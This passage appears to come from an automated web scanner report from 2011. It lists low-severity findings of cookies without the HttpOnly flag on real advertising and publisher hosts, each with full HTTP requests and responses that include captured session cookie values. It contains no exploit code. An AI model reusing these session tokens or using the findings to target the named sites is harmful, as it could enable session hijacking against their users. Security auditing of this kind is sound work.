if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("goT0SKb9csQQCWy8_378374");
13.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1120281364
Location: http://advertising.aol.com/token/4/3/1120281364/
Content-Length: 0
Content-Type: text/html

13.6. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=681228259
Location: http://advertising.aol.com/token/5/3/681228259/
Content-Length: 0
Content-Type: text/html

13.7. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1710369765
Location: http://advertising.aol.com/token/6/3/1710369765/
Content-Length: 0
Content-Type: text/html

13.8. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1664201834
Location: http://advertising.aol.com/token/7/3/1664201834/
Content-Length: 0
Content-Type: text/html

13.9. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1331479124
Location: http://advertising.aol.com/token/1/3/1331479124/
Content-Length: 0
Content-Type: text/html

13.10. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=876484099
Location: http://advertising.aol.com/token/3/3/876484099/
Content-Length: 0
Content-Type: text/html

13.11. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=745519684
Location: http://advertising.aol.com/token/0/2/745519684/
Content-Length: 0
Content-Type: text/html

13.12. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:45:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1952319602
Location: http://advertising.aol.com/token/8/3/1952319602/
Content-Length: 0
Content-Type: text/html

13.13. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E6EB92B6E651A4418BD90FFF001EBEA; atdses=O

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 16:46:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1458996317
Location: http://advertising.aol.com/token/2/3/1458996317/
Content-Length: 0
Content-Type: text/html

13.14. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=0.2690409 HTTP/1.1
Host: optout.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: id=2040695539456590; OAX=Mhd7ak45SYsADCcs; RMFL=011QqFEqU103Xq|U103zF; NXCLICK2=011QqFEuNX_Nonsecure!y!B3!3Xq!4qrNX_TRACK_Atandtwireless/Homepage_NX_Nonsecure!y!B3!3zF!5IxNX_TRACK_Atandtwireless/RTB_Retargeting_NX_Nonsecure!y!B3!gA!14l; mdata=1|2040695539456590|1313431890; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Fri, 17-Sep-2010 17:19:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Fri, 13-Sep-2024 17:19:14 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=0.2690409&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.15. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=144&pubId=24537&campId=176617 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=53B5F23AB36BD79521AB4E652A929124; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&
...[SNIP]...
13.16. http://syn.verticalacuity.com/varw/getPromo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://syn.verticalacuity.com
Path:   /varw/getPromo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=false&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316295851531&tOff=-5&seq=4 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1rdm6iidharwn1lmm5znlogr01

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:42:59 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Server: nginx
Set-Cookie: JSESSIONID=1i46jnkvq236snyxau8uddjd6;Path=/varw
Content-Length: 7109
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';    
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","ctx":{"c
...[SNIP]...
13.17. http://tag.admeld.com/nai-opt-out  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tag.admeld.com
Path:   /nai-opt-out

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai-opt-out?nocache=0.9953714 HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: meld_sess=642fefe9-2805-4880-8962-4149d004733c; D41U=3O_LLE8-29DICImy9URHxcH9B6xRZqc42EETd2Ub_PUcwXum8NjMz_w

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: /nai-test-opt-out
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 17 Sep 2011 17:14:29 GMT
Connection: close
Set-Cookie: admeld_opt_out=true;expires=Sun, 01 Jan 2017 05:00:00 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: meld_sess=delete;expires=Thu, 17 Jul 2008 07:27:49 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/nai-test-opt-out">here</a>.</p>
</body></html>
...[SNIP]...
13.18. http://www.gather.com/URI%20SYNTAX%20EXCEPTION  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gather.com
Path:   /URI%20SYNTAX%20EXCEPTION

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /URI%20SYNTAX%20EXCEPTION HTTP/1.1
Host: www.gather.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: gathersid=www06; ref=direct_www; __utma=185998783.1950058045.1316295781.1316295781.1316295781.1; __utmb=185998783.1.10.1316295781; __utmc=185998783; __utmz=185998783.1316295781.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 17 Sep 2011 16:42:04 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=642B4580EDE3E511BE324FC3053BDCDC; Domain=.gather.com; Path=/
Location: http://www.gather.com/URI+SYNTAX+EXCEPTION
Content-Length: 0
Content-Type: text/html;charset=UTF-8

13.19. http://www.stamfordadvocatedailydeals.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stamfordadvocatedailydeals.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.stamfordadvocatedailydeals.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Sat, 17 Sep 2011 16:35:49 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Set-Cookie: JSESSIONID=37103177E2916000C11FCE6C9EEDE52E.webserver4; Path=/
Set-Cookie: publisher=4dd2c8e1674abc91a59b2f06; Expires=Mon, 17-Oct-2011 16:46:40 GMT; Path=/
Set-Cookie: division=4dd2c8e1674abc91a39b2f06; Expires=Sun, 16-Sep-2012 16:46:40 GMT; Path=/
Set-Cookie: visitor=4e74cef01d535a807a8643a6; Expires=Sun, 16-Sep-2012 16:46:40 GMT; Path=/
Content-Length: 27

division found: favicon.ico
13.20. http://www.ugo.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ugo.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:01 GMT
Server: Apache
Set-Cookie: cgi-session-id=02CA2604-E14A-11E0-BC3F-0EFE2AB523E0; path=/
Set-Cookie: cgi-session-id=02CA2604-E14A-11E0-BC3F-0EFE2AB523E0; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: text/html
Cache-Control: private
Content-Length: 61418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraph
...[SNIP]...
13.21. http://www.ugo.com/takeover/takeover.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ugo.com
Path:   /takeover/takeover.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /takeover/takeover.js HTTP/1.1
Host: www.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cgi-session-id=87EABF5C-E149-11E0-A3B2-DE2D31DE560E

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:24:37 GMT
Server: Apache
Set-Cookie: cgi-session-id=892E3524-E149-11E0-B2DF-D8F552265BD2; path=/
Set-Cookie: cgi-session-id=892E3524-E149-11E0-B2DF-D8F552265BD2; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
nnCoection: close
Content-Type: application/x-javascript
Content-Length: 6185

var TYPE = 1; //1 is minutesToLive and 2 is count
var TIMELIMIT = 60; // happen every TIMELIMIT minutes when TYPE = 1
var FREQUENCY = 2; // happen every FREQUENCY times when TYPE = 2

if (typeof(takeo
...[SNIP]...
13.22. http://a.collective-media.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
13.23. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
